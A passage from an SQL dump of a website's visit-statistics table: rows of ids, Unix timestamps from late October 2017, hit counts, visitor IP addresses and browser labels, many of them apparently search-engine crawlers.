1,1,0,0,'91.196.178.163','chrome'),(172165,1509346063,1,1,0,0,'37.9.113.101','other'),(172166,1509346342,1,1,0,0,'180.76.15.23','other'),(172167,1509346599,1,1,0,0,'217.182.132.34','other'),(172168,1509346750,1,1,0,0,'8.29.198.25','other'),(172169,1509346812,1,1,0,0,'216.244.66.237','other'),(172170,1509346884,1,1,0,0,'91.196.178.69','chrome'),(172171,1509347211,1,1,0,0,'91.196.179.138','chrome'),(172172,1509347224,1,1,0,0,'178.154.171.55','other'),(172173,1509347230,1,1,0,0,'157.55.39.206','other'),(172174,1509347324,1,1,0,0,'51.255.65.56','other'),(172175,1509347609,1,1,0,0,'213.180.203.40','other'),(172176,1509348081,1,1,0,0,'91.196.178.67','chrome'),(172177,1509348120,1,1,0,0,'178.154.171.88','other'),(172178,1509348422,1,1,0,0,'91.196.178.166','chrome'),(172179,1509348487,1,1,0,0,'91.196.177.46','other'),(172180,1509349181,52,52,0,0,'64.120.56.210','other'),(172181,1509349258,1,1,0,0,'40.77.167.60','other'),(172182,1509349388,1,1,0,0,'91.196.178.66','firefox'),(172183,1509349415,1,1,0,0,'51.255.65.80','other'),(172184,1509349417,1,1,0,0,'91.196.178.166','chrome'),(172185,1509350096,1,1,0,0,'5.45.207.58','other'),(172186,1509350613,1,1,0,0,'5.45.207.83','other'),(172187,1509350791,1,1,0,0,'91.196.178.67','chrome'),(172188,1509351078,2,2,0,0,'95.213.141.126','opera'),(172189,1509351441,1,1,0,0,'217.69.133.226','other'),(172190,1509352158,1,1,0,0,'217.182.132.59','other'),(172191,1509352173,1,1,0,0,'51.255.65.67','other'),(172192,1509352187,1,1,0,0,'51.255.65.35','other'),(172193,1509352308,1,0,1,0,'66.249.64.28',''),(172194,1509352317,1,1,0,0,'178.154.171.88','other'),(172195,1509352452,1,1,0,0,'66.249.70.27','chrome'),(172196,1509352482,1,1,0,0,'66.249.64.29','chrome'),(172197,1509352691,1,1,0,0,'217.69.133.227','other'),(172198,1509352792,1,1,0,0,'217.182.132.85','other'),(172199,1509352913,1,1,0,0,'217.182.132.65','other'),(172200,1509353004,1,1,0,0,'88.81.59.228','msie'),(172201,1509353086,1,1,0,0,'217.182.132.71','other'),(172202,1509353096,1,1,0,0,'137.74.207.116','other'),(172203,1509353155,1,1,0,0,'51.255.65.63','other'),(172204,1509353258,1,1,0,0,'37.52.18.182','chrome'),(172205,1509353474,1,1,0,0,'217.182.132.150','other'),(172206,1509353500,1,1,0,0,'137.74.201.100','other'),(172207,1509353538,1,1,0,0,'94.179.116.156','chrome'),(172208,1509353584,1,1,0,0,'95.132.14.51','chrome'),(172209,1509353930,1,1,0,0,'51.255.65.91','other'),(172210,1509353950,1,0,1,0,'66.249.64.28',''),(172211,1509354707,2,2,0,0,'91.192.135.241','firefox'),(172212,1509354779,1,1,0,0,'213.108.45.138','chrome'),(172213,1509354973,1,1,0,0,'180.76.15.153','other'),(172214,1509355090,1,0,1,0,'66.249.64.28',''),(172215,1509355261,1,1,0,0,'37.52.57.167','firefox'),(172216,1509355327,1,1,0,0,'217.182.132.16','other'),(172217,1509355435,1,1,0,0,'51.255.65.53','other'),(172218,1509356366,13,13,0,0,'5.9.61.111','other'),(172219,1509356647,77,77,0,0,'23.237.4.26','other'),(172220,1509356742,1,1,0,0,'217.182.132.16','other'),(172221,1509357045,1,1,0,0,'91.196.178.133','chrome'),(172222,1509357263,1,1,0,0,'91.196.178.67','chrome'),(172223,1509357353,1,1,0,0,'91.196.178.65','firefox'),(172224,1509357453,1,1,0,0,'91.197.185.228','chrome'),(172225,1509357585,1,1,0,0,'8.29.198.26','other'),(172226,1509357917,1,1,0,0,'216.244.66.237','other'),(172227,1509358162,1,1,0,0,'66.249.64.28','chrome'),(172228,1509358217,1,1,0,0,'66.249.70.25','chrome'),(172229,1509358317,1,1,0,0,'91.196.178.66','firefox'),(172230,1509358413,1,1,0,0,'217.182.132.58','other'),(172231,1509358448,1,1,0,0,'157.55.39.197','other'),(172232,1509358688,1,1,0,0,'40.77.167.60','other'),(172233,1509358824,1,1,0,0,'178.154.171.88','other'),(172234,1509358999,1,1,0,0,'51.255.65.67','other'),(172235,1509359021,1,0,1,0,'66.249.64.29',''),(172236,1509359050,1,1,0,0,'217.182.132.65','other'),(172237,1509359231,1,1,0,0,'217.182.132.15','other'),(172238,1509359610,1,1,0,0,'137.74.207.116','other'),(172239,1509360225,1,1,0,0,'217.182.132.15','other'),(172240,1509360509,1,1,0,0,'164.132.162.160','other'),(172241,1509360824,1,1,0,0,'217.182.132.51','other'),(172242,1509360982,1,1,0,0,'91.196.178.69','firefox'),(172243,1509360989,1,1,0,0,'95.132.33.106','firefox'),(172244,1509361311,1,1,0,0,'141.8.142.74','other'),(172245,1509361342,1,1,0,0,'51.255.65.51','other'),(172246,1509361487,1,1,0,0,'91.196.178.68','firefox'),(172247,1509361544,2,2,0,0,'37.73.238.45','chrome'),(172248,1509361845,1,1,0,0,'51.255.65.8','other'),(172249,1509361913,1,1,0,0,'217.69.133.232','other'),(172250,1509362474,1,1,0,0,'51.255.65.83','other'),(172251,1509363706,1,1,0,0,'91.196.178.99','chrome'),(172252,1509364032,49,49,0,0,'192.99.203.35','other'),(172253,1509364152,1,1,0,0,'128.199.41.247','chrome'),(172254,1509364582,1,1,0,0,'217.69.133.18','other'),(172255,1509364629,1,1,0,0,'217.182.132.192','other'),(172256,1509364804,1,1,0,0,'40.77.167.60','other'),(172257,1509365215,1,1,0,0,'162.210.196.129','other'),(172258,1509365332,1,1,0,0,'157.55.39.206','other'),(172259,1509365734,1,0,1,0,'66.249.70.29',''),(172260,1509365858,1,1,0,0,'217.69.133.60','other'),(172261,1509365976,1,1,0,0,'51.255.65.23','other'),(172262,1509366099,1,1,0,0,'180.76.15.149','other'),(172263,1509366172,1,1,0,0,'217.182.132.35','other'),(172264,1509366269,1,1,0,0,'91.196.178.66','chrome'),(172265,1509366726,1,1,0,0,'137.74.207.164','other'),(172266,1509366750,1,1,0,0,'217.182.132.153','other'),(172267,1509366902,1,1,0,0,'157.55.39.197','other'),(172268,1509367276,1,1,0,0,'51.255.65.97','other'),(172269,1509367472,1,1,0,0,'51.255.65.56','other'),(172270,1509367481,1,1,0,0,'91.196.178.133','firefox'),(172271,1509367581,1,1,0,0,'95.135.90.83','chrome'),(172272,1509367585,1,1,0,0,'164.132.164.180','other'),(172273,1509367684,1,1,0,0,'37.9.113.115','other'),(172274,1509367745,1,1,0,0,'37.9.113.114','other'),(172275,1509367783,1,1,0,0,'91.196.178.67','chrome'),(172276,1509367981,1,1,0,0,'51.255.64.106','other'),(172277,1509368322,1,1,0,0,'91.196.178.66','chrome'),(172278,1509368437,1,1,0,0,'8.29.198.26','other'),(172279,1509368507,1,1,0,0,'91.209.11.236','other'),(172280,1509368767,1,1,0,0,'217.182.132.67','other'),(172281,1509368843,1,1,0,0,'91.196.178.166','chrome'),(172282,1509368862,1,1,0,0,'91.196.178.67','chrome'),(172283,1509369135,1,1,0,0,'217.182.132.148','other'),(172284,1509369268,1,1,0,0,'51.255.71.111','other'),(172285,1509369421,1,1,0,0,'217.182.132.84','other'),(172286,1509369423,1,1,0,0,'176.31.231.10','other'),(172287,1509369780,1,1,0,0,'91.196.178.65','chrome'),(172288,1509370227,1,1,0,0,'91.196.178.67','firefox'),(172289,1509370238,2,2,0,0,'92.112.125.0','chrome'),(172290,1509370296,1,1,0,0,'91.196.178.166','chrome'),(172291,1509370341,1,1,0,0,'66.249.70.25','chrome'),(172292,1509370589,1,1,0,0,'51.255.65.82','other'),(172293,1509370785,1,1,0,0,'91.196.178.65','chrome'),(172294,1509371040,1,1,0,0,'217.182.132.35','other'),(172295,1509371161,1,1,0,0,'137.74.201.99','other'),(172296,1509371725,1,1,0,0,'91.196.178.168','chrome'),(172297,1509372004,1,1,0,0,'95.135.90.83','chrome'),(172298,1509372172,1,1,0,0,'195.248.163.186','opera'),(172299,1509372181,1,1,0,0,'91.196.178.36','chrome'),(172300,1509372243,1,1,0,0,'51.255.65.59','other'),(172301,1509372391,1,1,0,0,'217.182.132.173','other'),(172302,1509372615,1,1,0,0,'92.112.125.0','chrome'),(172303,1509372797,1,1,0,0,'91.196.178.166','chrome'),(172304,1509373105,1,1,0,0,'217.182.132.23','other'),(172305,1509373387,1,1,0,0,'37.52.18.182','chrome'),(172306,1509373768,1,1,0,0,'178.154.171.10','other'),(172307,1509373844,1,1,0,0,'5.228.18.8','msie'),(172308,1509373851,1,1,0,0,'5.228.8.11','msie'),(172309,1509374218,1,1,0,0,'217.182.132.175','other'),(172310,1509374330,1,1,0,0,'194.146.191.195','chrome'),(172311,1509374455,1,1,0,0,'92.112.125.0','chrome'),(172312,1509374596,1,1,0,0,'91.196.177.42','chrome'),(172313,1509374776,1,1,0,0,'91.196.178.69','firefox'),(172314,1509374975,1,1,0,0,'91.196.178.165','chrome'),(172315,1509374989,1,1,0,0,'91.196.178.65','chrome'),(172316,1509375030,1,1,0,0,'217.182.132.78','other'),(172317,1509375726,1,1,0,0,'217.182.132.187','other'),(172318,1509375764,1,1,0,0,'91.196.178.168','chrome'),(172319,1509376167,1,1,0,0,'217.69.133.192','other'),(172320,1509376279,1,0,1,0,'66.249.64.30',''),(172321,1509376298,1,1,0,0,'51.255.65.47','other'),(172322,1509376427,1,1,0,0,'91.196.178.65','chrome'),(172323,1509376767,1,1,0,0,'51.255.65.27','other'),(172324,1509376840,1,1,0,0,'46.133.127.26','chrome'),(172325,1509376847,1,1,0,0,'91.196.178.168','chrome'),(172326,1509376938,1,1,0,0,'188.163.18.43','firefox'),(172327,1509377231,1,1,0,0,'37.9.113.114','other'),(172328,1509377235,1,1,0,0,'87.250.224.85','other'),(172329,1509377805,1,1,0,0,'91.196.178.168','chrome'),(172330,1509378798,1,1,0,0,'51.255.71.132','other'),(172331,1509378956,1,1,0,0,'217.182.132.21','other'),(172332,1509379124,2,2,0,0,'217.182.132.88','other'),(172333,1509379131,1,1,0,0,'40.77.167.60','other'),(172334,1509379274,1,1,0,0,'8.29.198.25','other'),(172335,1509379310,1,1,0,0,'217.69.133.220','other'),(172336,1509379510,1,1,0,0,'91.196.178.168','chrome'),(172337,1509379710,1,1,0,0,'217.182.132.179','other'),(172338,1509379801,1,1,0,0,'51.255.71.111','other'),(172339,1509379813,2,2,0,0,'78.158.11.226','other'),(172340,1509380159,1,1,0,0,'217.182.132.62','other'),(172341,1509380494,1,1,0,0,'51.255.65.91','other'),(172342,1509380507,1,1,0,0,'51.255.65.60','other'),(172343,1509380723,1,1,0,0,'217.69.133.246','other'),(172344,1509380925,1,1,0,0,'66.249.70.29','chrome'),(172345,1509381236,1,1,0,0,'51.255.65.7','other'),(172346,1509381372,1,1,0,0,'51.255.64.106','other'),(172347,1509381843,1,1,0,0,'217.182.132.16','other'),(172348,1509382157,1,1,0,0,'217.182.132.75','other'),(172349,1509382725,1,1,0,0,'51.255.65.63','other'),(172350,1509382930,1,1,0,0,'51.255.65.14','other'),(172351,1509383827,1,1,0,0,'51.255.65.36','other'),(172352,1509383863,1,1,0,0,'5.45.207.58','other'),(172353,1509383866,1,1,0,0,'5.45.207.49','other'),(172354,1509384083,1,0,1,0,'66.249.70.25',''),(172355,1509384111,1,1,0,0,'141.8.132.19','other'),(172356,1509384526,1,1,0,0,'51.255.65.31','other'),(172357,1509384832,1,1,0,0,'217.69.133.249','other'),(172358,1509384835,1,1,0,0,'217.69.133.218','other'),(172359,1509385298,1,1,0,0,'217.182.132.86','other'),(172360,1509385403,1,1,0,0,'192.162.135.170','chrome'),(172361,1509385676,1,1,0,0,'178.154.171.88','other'),(172362,1509386028,1,1,0,0,'217.182.132.22','other'),(172363,1509386029,1,1,0,0,'37.9.113.182','other'),(172364,1509386784,1,1,0,0,'51.255.71.130','other'),(172365,1509386997,1,1,0,0,'51.255.65.68','other'),(172366,1509387119,1,1,0,0,'37.9.113.182','other'),(172367,1509387626,1,1,0,0,'178.154.171.88','other'),(172368,1509387812,1,1,0,0,'94.178.110.52','chrome'),(172369,1509388077,1,1,0,0,'217.182.132.15','other'),(172370,1509388409,1,1,0,0,'217.182.132.184','other'),(172371,1509388513,1,1,0,0,'51.255.65.35','other'),(172372,1509388777,1,1,0,0,'51.255.65.94','other'),(172373,1509389394,1,1,0,0,'46.48.13.161','chrome'),(172374,1509390112,1,1,0,0,'8.29.198.27','other'),(172375,1509390688,1,1,0,0,'216.244.66.237','other'),(172376,1509391558,1,1,0,0,'157.55.39.206','other'),(172377,1509391727,1,1,0,0,'51.255.65.61','other'),(172378,1509391955,1,1,0,0,'217.182.132.61','other'),(172379,1509392067,1,1,0,0,'74.115.214.158','other'),(172380,1509392176,1,1,0,0,'188.146.43.241','chrome'),(172381,1509392323,1,1,0,0,'217.182.132.240','other'),(172382,1509392424,1,1,0,0,'51.255.65.37','other'),(172383,1509392958,1,1,0,0,'164.132.162.159','other'),(172384,1509393282,1,1,0,0,'157.55.39.206','other'),(172385,1509393765,1,1,0,0,'51.255.71.112','other'),(172386,1509393921,1,1,0,0,'217.182.132.57','other'),(172387,1509394045,1,1,0,0,'137.74.207.170','other'),(172388,1509394321,1,1,0,0,'176.8.141.224','chrome'),(172389,1509394446,1,1,0,0,'51.255.65.58','other'),(172390,1509395668,1,1,0,0,'46.211.67.176','chrome'),(172391,1509396083,1,1,0,0,'217.69.133.225','other'),(172392,1509396144,1,1,0,0,'51.255.65.63','other'),(172393,1509397389,1,1,0,0,'217.182.132.33','other'),(172394,1509397478,1,1,0,0,'51.255.65.34','other'),(172395,1509397613,1,1,0,0,'51.255.65.12','other'),(172396,1509397767,1,1,0,0,'51.255.65.96','other'),(172397,1509397904,1,1,0,0,'217.182.132.173','other'),(172398,1509397983,1,1,0,0,'157.55.39.143','other'),(172399,1509397988,1,1,0,0,'217.182.132.75','other'),(172400,1509398221,1,1,0,0,'157.55.39.197','other'),(172401,1509398565,1,1,0,0,'217.182.132.80','other'),(172402,1509398670,1,0,1,0,'66.249.70.27',''),(172403,1509399007,1,1,0,0,'216.244.66.237','other'),(172404,1509399436,1,1,0,0,'157.55.39.206','other'),(172405,1509399440,1,1,0,0,'51.255.65.70','other'),(172406,1509399955,1,1,0,0,'185.12.8.17','chrome'),(172407,1509400166,1,1,0,0,'217.182.132.156','other'),(172408,1509400279,1,1,0,0,'178.154.171.81','other'),(172409,1509400766,1,1,0,0,'180.76.15.140','other'),(172410,1509400944,1,1,0,0,'8.29.198.26','other'),(172411,1509400958,1,1,0,0,'51.255.65.81','other'),(172412,1509401281,1,1,0,0,'157.55.39.197','other'),(172413,1509401484,1,1,0,0,'51.255.71.113','other'),(172414,1509401794,1,1,0,0,'213.180.203.40','other'),(172415,1509401856,1,1,0,0,'37.9.113.132','other'),(172416,1509402144,1,1,0,0,'37.9.113.100','other'),(172417,1509402529,1,1,0,0,'51.255.65.44','other'),(172418,1509402922,1,1,0,0,'217.182.132.19','other'),(172419,1509402959,1,1,0,0,'137.74.203.194','other'),(172420,1509403454,1,1,0,0,'51.255.65.12','other'),(172421,1509403858,1,1,0,0,'217.69.133.191','other'),(172422,1509404509,1,1,0,0,'51.255.65.3','other'),(172423,1509406032,1,1,0,0,'217.182.132.240','other'),(172424,1509406054,1,1,0,0,'217.182.132.5','other'),(172425,1509406149,1,1,0,0,'193.201.224.32','chrome'),(172426,1509407225,5,5,0,0,'167.114.219.41','other'),(172427,1509407698,1,1,0,0,'66.249.64.30','chrome'),(172428,1509407743,1,1,0,0,'66.249.70.27','chrome'),(172429,1509408129,1,1,0,0,'51.255.65.35','other'),(172430,1509408220,1,1,0,0,'51.255.71.130','other'),(172431,1509408400,1,1,0,0,'217.182.132.185','other'),(172432,1509408596,1,1,0,0,'37.9.113.101','other'),(172433,1509408715,1,1,0,0,'137.74.207.119','other'),(172434,1509409161,1,1,0,0,'178.154.200.7','other'),(172435,1509409334,1,1,0,0,'66.249.64.28','chrome'),(172436,1509409393,1,1,0,0,'87.250.224.85','other'),(172437,1509409578,1,1,0,0,'51.255.65.43','other'),(172438,1509409658,1,1,0,0,'51.255.71.115','other'),(172439,1509409735,24,24,0,0,'88.198.55.175','other'),(172440,1509410363,1,1,0,0,'40.77.167.56','other'),(172441,1509410376,1,1,0,0,'188.32.176.243','msie'),(172442,1509410505,1,1,0,0,'51.255.65.8','other'),(172443,1509410568,1,1,0,0,'51.255.65.37','other'),(172444,1509410599,1,1,0,0,'217.182.132.50','other'),(172445,1509410653,1,1,0,0,'5.45.207.83','other'),(172446,1509410656,1,1,0,0,'178.154.200.8','other'),(172447,1509411140,1,1,0,0,'69.30.213.202','other'),(172448,1509411542,1,1,0,0,'217.182.132.75','other'),(172449,1509411549,1,1,0,0,'217.69.133.30','other'),(172450,1509411798,1,1,0,0,'8.29.198.25','other'),(172451,1509411965,1,1,0,0,'157.55.39.206','other'),(172452,1509412070,1,1,0,0,'51.255.65.51','other'),(172453,1509412209,6,6,0,0,'46.229.168.69','other'),(172454,1509412230,4,4,0,0,'46.229.168.67','other'),(172455,1509412256,2,2,0,0,'46.229.168.73','other'),(172456,1509412288,6,6,0,0,'46.229.168.77','other'),(172457,1509412328,5,5,0,0,'46.229.168.79','other'),(172458,1509412401,8,8,0,0,'46.229.168.80','other'),(172459,1509412423,7,7,0,0,'46.229.168.71','other'),(172460,1509412434,6,6,0,0,'46.229.168.74','other'),(172461,1509412494,1,1,0,0,'51.255.65.86','other'),(172462,1509412505,2,2,0,0,'46.229.168.68','other'),(172463,1509412603,5,5,0,0,'46.229.168.75','other'),(172464,1509412645,1,1,0,0,'46.229.168.70','other'),(172465,1509412648,2,2,0,0,'46.229.168.65','other'),(172466,1509412727,5,5,0,0,'46.229.168.78','other'),(172467,1509412748,1,1,0,0,'217.182.132.14','other'),(172468,1509412869,5,5,0,0,'46.229.168.76','other'),(172469,1509413110,3,3,0,0,'46.229.168.69','other'),(172470,1509413224,6,6,0,0,'46.229.168.73','other'),(172471,1509413244,6,6,0,0,'46.229.168.72','other'),(172472,1509413351,4,4,0,0,'46.229.168.71','other'),(172473,1509413391,4,4,0,0,'46.229.168.66','other'),(172474,1509413438,4,4,0,0,'46.229.168.80','other'),(172475,1509413472,1,1,0,0,'51.255.71.110','other'),(172476,1509413475,7,7,0,0,'46.229.168.68','other'),(172477,1509413512,5,5,0,0,'46.229.168.79','other'),(172478,1509413567,4,4,0,0,'46.229.168.67','other'),(172479,1509413589,7,7,0,0,'46.229.168.74','other'),(172480,1509413696,3,3,0,0,'46.229.168.77','other'),(172481,1509413780,3,3,0,0,'46.229.168.78','other'),(172482,1509413999,5,5,0,0,'46.229.168.65','other'),(172483,1509414000,1,0,1,0,'66.249.70.25',''),(172484,1509414109,3,3,0,0,'46.229.168.76','other'),(172485,1509414142,5,5,0,0,'46.229.168.70','other'),(172486,1509414182,2,2,0,0,'46.229.168.73','other'),(172487,1509414256,7,7,0,0,'46.229.168.71','other'),(172488,1509414292,3,3,0,0,'46.229.168.75','other'),(172489,1509414358,1,1,0,0,'46.229.168.80','other'),(172490,1509414393,7,7,0,0,'46.229.168.69','other'),(172491,1509414486,8,8,0,0,'46.229.168.72','other'),(172492,1509414502,5,5,0,0,'46.229.168.68','other'),(172493,1509414507,1,1,0,0,'217.182.132.51','other'),(172494,1509414537,1,0,1,0,'66.249.64.30',''),(172495,1509414632,5,5,0,0,'46.229.168.66','other'),(172496,1509414686,3,3,0,0,'46.229.168.67','other'),(172497,1509414873,4,4,0,0,'46.229.168.77','other'),(172498,1509414994,6,6,0,0,'46.229.168.74','other'),(172499,1509415068,8,8,0,0,'46.229.168.79','other'),(172500,1509415105,5,5,0,0,'46.229.168.78','other'),(172501,1509415228,4,4,0,0,'46.229.168.70','other'),(172502,1509415259,1,1,0,0,'217.182.132.5','other'),(172503,1509415267,2,2,0,0,'46.229.168.76','other'),(172504,1509415319,6,6,0,0,'46.229.168.71','other'),(172505,1509415357,4,4,0,0,'46.229.168.73','other'),(172506,1509415370,3,3,0,0,'46.229.168.65','other'),(172507,1509415386,1,1,0,0,'51.255.71.132','other'),(172508,1509415463,4,4,0,0,'46.229.168.72','other'),(172509,1509415538,6,6,0,0,'46.229.168.66','other'),(172510,1509415585,1,1,0,0,'217.69.136.206','other'),(172511,1509415591,6,6,0,0,'46.229.168.69','other'),(172512,1509415712,1,1,0,0,'51.255.65.54','other'),(172513,1509415719,4,4,0,0,'46.229.168.80','other'),(172514,1509415735,3,3,0,0,'46.229.168.67','other'),(172515,1509415897,15,15,0,0,'91.121.109.55','other'),(172516,1509415998,4,4,0,0,'46.229.168.79','other'),(172517,1509416161,2,2,0,0,'46.229.168.68','other'),(172518,1509416195,1,1,0,0,'164.132.164.180','other'),(172519,1509416208,4,4,0,0,'46.229.168.74','other'),(172520,1509416254,1,1,0,0,'46.229.168.78','other'),(172521,1509416278,1,1,0,0,'37.9.113.132','other'),(172522,1509416291,2,2,0,0,'46.229.168.76','other'),(172523,1509416326,3,3,0,0,'46.229.168.65','other'),(172524,1509416396,3,3,0,0,'46.229.168.73','other'),(172525,1509416435,1,1,0,0,'46.229.168.72','other'),(172526,1509416475,1,1,0,0,'40.77.167.56','other'),(172527,1509416513,3,3,0,0,'46.229.168.75','other'),(172528,1509416534,1,1,0,0,'46.229.168.69','other'),(172529,1509416555,1,1,0,0,'46.229.168.77','other'),(172530,1509416606,1,1,0,0,'46.229.168.71','other'),(172531,1509417090,1,1,0,0,'51.255.65.58','other'),(172532,1509417285,1,1,0,0,'217.182.132.176','other'),(172533,1509418242,1,1,0,0,'217.182.132.171','other'),(172534,1509418246,1,1,0,0,'217.69.133.219','other'),(172535,1509418360,1,1,0,0,'51.255.65.51','other'),(172536,1509419013,1,1,0,0,'51.255.65.19','other'),(172537,1509420500,1,1,0,0,'51.255.65.95','other'),(172538,1509420530,1,1,0,0,'51.255.65.93','other'),(172539,1509420956,1,1,0,0,'137.74.203.194','other'),(172540,1509421499,1,1,0,0,'51.255.65.79','other'),(172541,1509422637,1,1,0,0,'8.29.198.27','other'),(172542,1509423247,1,1,0,0,'107.167.104.236','other'),(172543,1509424160,1,1,0,0,'78.106.119.52','msie'),(172544,1509424162,1,1,0,0,'37.110.29.246','msie'),(172545,1509424369,1,1,0,0,'157.55.39.206','other'),(172546,1509424464,1,1,0,0,'217.69.133.15','other'),(172547,1509425101,1,1,0,0,'217.182.132.75','other'),(172548,1509425268,1,1,0,0,'217.182.132.65','other'),(172549,1509425498,1,1,0,0,'217.182.132.85','other'),(172550,1509427400,1,1,0,0,'66.249.64.29','chrome'),(172551,1509427974,1,1,0,0,'157.55.39.197','other'),(172552,1509428547,1,1,0,0,'37.9.113.114','other'),(172553,1509428608,1,1,0,0,'5.45.207.82','other'),(172554,1509428624,1,1,0,0,'217.182.132.85','other'),(172555,1509429378,1,1,0,0,'37.9.113.207','other'),(172556,1509430128,1,1,0,0,'91.196.178.66','firefox'),(172557,1509430761,1,1,0,0,'217.182.132.71','other'),(172558,1509431077,1,0,1,0,'66.249.64.28',''),(172559,1509431292,1,1,0,0,'217.182.132.171','other'),(172560,1509431923,1,1,0,0,'164.132.162.153','other'),(172561,1509432104,1,1,0,0,'157.55.39.143','other'),(172562,1509432250,1,1,0,0,'51.255.65.75','other'),(172563,1509432277,1,1,0,0,'217.182.132.63','other'),(172564,1509432293,1,0,1,0,'66.249.70.27',''),(172565,1509432782,1,1,0,0,'91.196.178.67','chrome'),(172566,1509433473,1,1,0,0,'8.29.198.27','other'),(172567,1509433530,1,1,0,0,'37.9.113.115','other'),(172568,1509433832,1,1,0,0,'217.69.133.60','other'),(172569,1509433873,1,1,0,0,'91.196.178.67','chrome'),(172570,1509434072,1,1,0,0,'217.69.133.217','other'),(172571,1509434078,1,1,0,0,'91.196.178.129','chrome'),(172572,1509434202,1,1,0,0,'66.249.64.28','chrome'),(172573,1509434216,1,1,0,0,'217.182.132.173','other'),(172574,1509434221,1,1,0,0,'217.182.132.34','other'),(172575,1509434346,1,1,0,0,'137.74.207.120','other'),(172576,1509434396,1,1,0,0,'51.255.65.35','other'),(172577,1509434637,1,1,0,0,'37.73.214.212','chrome'),(172578,1509434744,1,1,0,0,'91.196.178.136','firefox'),(172579,1509434750,1,1,0,0,'217.182.132.170','other'),(172580,1509435300,1,1,0,0,'178.154.171.88','other'),(172581,1509435413,1,1,0,0,'91.196.178.68','chrome'),(172582,1509435640,1,1,0,0,'217.182.132.51','other'),(172583,1509435712,1,1,0,0,'178.154.171.60','other'),(172584,1509436235,4,4,0,0,'91.209.51.22','other'),(172585,1509436634,1,1,0,0,'217.182.132.88','other'),(172586,1509436824,1,1,0,0,'91.196.178.67','chrome'),(172587,1509437192,1,1,0,0,'91.196.178.165','chrome'),(172588,1509437826,1,0,1,0,'66.249.70.29',''),(172589,1509437827,1,1,0,0,'91.196.178.37','chrome'),(172590,1509437938,1,1,0,0,'217.182.132.68','other'),(172591,1509437940,1,1,0,0,'95.133.41.209','chrome'),(172592,1509438125,1,1,0,0,'51.255.65.18','other'),(172593,1509438198,1,1,0,0,'46.174.241.162','chrome'),(172594,1509438416,1,1,0,0,'51.255.65.8','other'),(172595,1509438427,1,1,0,0,'217.69.133.244','other'),(172596,1509438446,1,1,0,0,'91.196.178.70','chrome'),(172597,1509439251,1,1,0,0,'82.207.91.234','other'),(172598,1509439630,1,1,0,0,'95.133.41.209','chrome'),(172599,1509439855,1,1,0,0,'91.196.178.161','chrome'),(172600,1509440115,1,1,0,0,'91.196.178.166','chrome'),(172601,1509440898,1,1,0,0,'157.55.39.197','other'),(172602,1509441356,1,1,0,0,'207.46.13.21','other'),(172603,1509441761,1,1,0,0,'188.32.244.46','msie'),(172604,1509442042,1,1,0,0,'91.196.178.67','chrome'),(172605,1509442427,1,1,0,0,'94.179.16.204','firefox'),(172606,1509443036,1,1,0,0,'91.196.178.67','chrome'),(172607,1509443297,1,1,0,0,'37.53.229.33','chrome'),(172608,1509443622,1,1,0,0,'216.244.66.237','other'),(172609,1509443663,1,1,0,0,'77.222.134.100','firefox'),(172610,1509444339,1,1,0,0,'8.29.198.25','other'),(172611,1509444769,1,1,0,0,'77.222.134.100','firefox'),(172612,1509444982,1,1,0,0,'91.196.178.67','chrome'),(172613,1509444994,1,1,0,0,'94.178.156.210','chrome'),(172614,1509445201,1,1,0,0,'217.69.133.68','other'),(172615,1509445252,1,1,0,0,'40.77.167.75','other'),(172616,1509445327,2,2,0,0,'91.196.178.68','chrome'),(172617,1509445411,1,0,1,0,'66.249.64.30',''),(172618,1509445624,1,0,1,0,'66.249.64.28',''),(172619,1509446313,1,1,0,0,'95.220.109.36','msie'),(172620,1509447296,1,1,0,0,'188.32.176.159','chrome'),(172621,1509447821,1,1,0,0,'91.196.177.15','chrome'),(172622,1509447994,1,1,0,0,'141.8.142.74','other'),(172623,1509448091,3,3,0,0,'178.151.143.163','other'),(172624,1509448525,1,1,0,0,'82.207.91.234','other'),(172625,1509450157,1,1,0,0,'51.255.71.127','other'),(172626,1509450398,1,1,0,0,'91.196.178.70','firefox'),(172627,1509450485,1,1,0,0,'180.76.15.137','other'),(172628,1509450643,1,1,0,0,'77.222.134.100','firefox'),(172629,1509450968,1,1,0,0,'91.196.178.166','chrome'),(172630,1509451324,1,1,0,0,'217.182.132.53','other'),(172631,1509451683,1,1,0,0,'162.210.196.100','other'),(172632,1509452650,1,1,0,0,'217.182.132.77','other'),(172633,1509452739,1,1,0,0,'217.69.136.207','other'),(172634,1509452862,1,1,0,0,'51.255.65.52','other'),(172635,1509452938,1,1,0,0,'35.184.189.105','other'),(172636,1509453031,1,1,0,0,'51.255.71.132','other'),(172637,1509453035,1,1,0,0,'217.182.132.16','other'),(172638,1509453797,1,1,0,0,'217.182.132.190','other'),(172639,1509454186,1,1,0,0,'217.69.133.216','other'),(172640,1509454190,1,1,0,0,'137.74.207.164','other'),(172641,1509454210,1,1,0,0,'212.86.229.27','chrome'),(172642,1509454537,1,1,0,0,'217.182.132.155','other'),(172643,1509455203,1,1,0,0,'8.29.198.26','other'),(172644,1509455579,1,1,0,0,'217.182.132.68','other'),(172645,1509455687,1,1,0,0,'95.220.107.126','msie'),(172646,1509455688,1,1,0,0,'137.74.207.159','other'),(172647,1509456246,1,1,0,0,'217.182.132.52','other'),(172648,1509456649,1,1,0,0,'37.73.235.235','chrome'),(172649,1509456721,1,1,0,0,'137.74.207.119','other'),(172650,1509456918,1,1,0,0,'137.74.207.188','other'),(172651,1509457020,1,1,0,0,'217.182.132.35','other'),(172652,1509457675,1,1,0,0,'137.74.207.120','other'),(172653,1509458298,1,1,0,0,'91.196.178.66','chrome'),(172654,1509458601,1,1,0,0,'178.154.171.88','other'),(172655,1509458810,1,1,0,0,'91.196.178.69','firefox'),(172656,1509459410,1,1,0,0,'91.208.145.231','chrome'),(172657,1509459515,3,3,0,0,'136.243.68.226','other'),(172658,1509459682,1,1,0,0,'217.182.132.33','other'),(172659,1509459853,1,1,0,0,'217.182.132.186','other'),(172660,1509460131,1,1,0,0,'91.196.178.166','chrome'),(172661,1509460456,1,1,0,0,'217.182.132.17','other'),(172662,1509460631,1,1,0,0,'51.255.65.88','other'),(172663,1509461362,1,1,0,0,'51.255.65.32','other'),(172664,1509461769,1,1,0,0,'92.113.127.122','chrome'),(172665,1509462317,1,1,0,0,'217.182.132.79','other'),(172666,1509462830,1,1,0,0,'40.77.167.56','other'),(172667,1509463651,1,1,0,0,'217.182.132.57','other'),(172668,1509464270,1,1,0,0,'51.255.66.102','other'),(172669,1509464472,1,1,0,0,'51.255.65.36','other'),(172670,1509464720,1,1,0,0,'51.255.65.39','other'),(172671,1509464891,1,1,0,0,'217.69.134.154','other'),(172672,1509465132,1,1,0,0,'164.132.162.159','other'),(172673,1509465764,1,1,0,0,'217.69.136.203','othe